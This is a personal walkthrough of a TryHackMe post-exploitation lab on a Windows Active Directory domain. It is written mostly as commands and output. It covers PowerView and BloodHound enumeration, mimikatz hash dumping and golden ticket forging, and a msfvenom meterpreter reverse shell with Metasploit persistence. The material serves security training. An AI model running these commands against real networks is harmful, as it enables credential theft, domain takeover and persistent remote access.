https://tryhackme.com/room/postexploit

Task 2 - Enumeration w/ PowerView

$ ssh [email protected]

> powershell -ep bypass # bypass execution policy so you can run scripts
PS> . .\\Downloads\\PowerView.ps1
PS> Get-NetUser | select cn
PS> Get-NetGroup -GroupName *admin*

PS> Invoke-ShareFinder
PS> Get-NetComputer -fulldata | select operatingsystem

Task 3 - Enumeration w/ Bloodhound

PS> . .\\Downloads\\SharpHound.ps1
PS> Invoke-Bloodhound -CollectionMethod All -Domain CONTROLLER.local -ZipFileName loot.zip
PS> scp -o StrictHostKeyChecking=no 20200802172728_loot.zip [email protected]:~

kali@kali:~$ sudo neo4j console
# Browser: <http://localhost:7474> -> login with neo4j:neo4j(j)
kali@kali:~$ bloodhound

In Bloodhound

Task 4 - Dumping Hashes w/ mimikatz

> cd Downloads && mimikatz.exe

# ensure running as admin
mimikatz # privilege::debug
Privilege '20' OK

# dump hashes
mimikatz # lsadump::lsa /patch
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166
RID  : 000001f4 (500)                                         
User : Administrator                                          
LM   :                                                        
NTLM : 2777b7fec870e04dda00cd7260f7bee6
[...]

kali@kali:~$ hashcat -m1000 <hash> rockyou.txt

Task 5 - Golden Ticket Attacks w/ mimikatz

> cd Downloads && mimikatz.exe

# ensure running as admin
mimikatz # privilege::debug

# dump hash and identifier of KTGT
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-849420856-2351964222-986696166 
RID  : 000001f6 (502)
User : krbtgt
 * Primary
    NTLM : 5508500012cc005cf7082a9a89ebdfdf

# generate golden ticket
mimikatz # kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-849420856-2351964222-986696166 /krbtgt:5508500012cc005cf7082a9a89ebdfdf /id:500

# open cmd with elevated privileges
mimikatz # misc::cmd
Patch OK for 'cmd.exe' from 'DisableCMD' to 'KiwiAndCMD' @ 00007FF6CBE143B8

# can't in box, but for example
> dir \\\\Desktop-1\\c$ # view Desktop-1 C:\\
> PsExec.exe \\\\Desktop-1 cmd.exe # run cmd as Desktop-1

Task 6 - Enumeration w/ Server Manager

RDP (Remmina)

Simply look around 🙂

Task 7 - Maintaining Access

# create payload
kali@kali:~$ msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.8.83.23 LPORT=5555 -f exe -o shell.exe

# delivering payload
kali@kali:~$ scp shell.exe [email protected]:.

# connecting to payload
kali@kali:~$ msfconsole
msf5 > use exploit/multi/handler
msf5 exploit(multi/handler) > set lhost 10.8.83.23
msf5 exploit(multi/handler) > run [-z] # to background
[*] Started reverse TCP handler on 10.8.83.23:4444
# run shell.exe on target machine
[*] Command shell session 1 opened (10.8.83.23:4444 -> 10.10.242.217:50062) at 2020-08-02 22:21:15 -0400
background

# creating persistence
msf5 exploit(multi/handler) > use exploit/windows/local/persistence
msf5 exploit(windows/local/persistence) > set session 1
msf5 exploit(windows/local/persistence) > run

# if connection dies, redo msf5 exploit(multi/handler) > run

# some difficulties getting to work